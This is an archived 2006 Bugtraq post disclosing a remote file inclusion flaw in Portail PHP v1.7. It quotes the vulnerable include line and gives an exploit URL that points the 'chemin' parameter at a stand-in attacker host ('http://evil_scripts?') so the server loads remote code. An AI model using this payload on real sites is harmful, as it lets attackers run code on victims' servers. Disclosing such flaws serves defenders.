Portail PHP v1.7 Remote File Include

---

• From: Meftun@xxxxxxxxxxxxx
• Date: 28 Jul 2006 10:31:24 -0000

---

Portail PHP v1.7 <- (chemin) Remote Inclusion Vulnerability

#Author: #######################
#########C-W-M#########
###www.meftunnet.com###
#########TURKEI########
#######################

#script: Portail PHP

#Class : Remote

#cont@ct: meftun[at]meftunnet[dot]com

#CODE: include ("$chemin/include/config.php")

#Exploit:
http://www.site.com/[path]/mod_membre/inscription.php?chemin=http://evil_scripts?

#Thanx : Www.HackMaster.Us

#Greetz: RooTTeR, XYU, Cyborg, BuZuL and all Hackmaster.Us Users

---

• Prev by Date: [SECURITY] [DSA 1128-1] New heartbeat packages fix local denial of service
• Next by Date: [OpenPKG-SA-2006.016] OpenPKG Security Advisory (ruby)
• Previous by thread: [SECURITY] [DSA 1128-1] New heartbeat packages fix local denial of service
• Next by thread: Re: Portail PHP v1.7 Remote File Include
• Index(es):
  • Date
  • Thread

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2006-07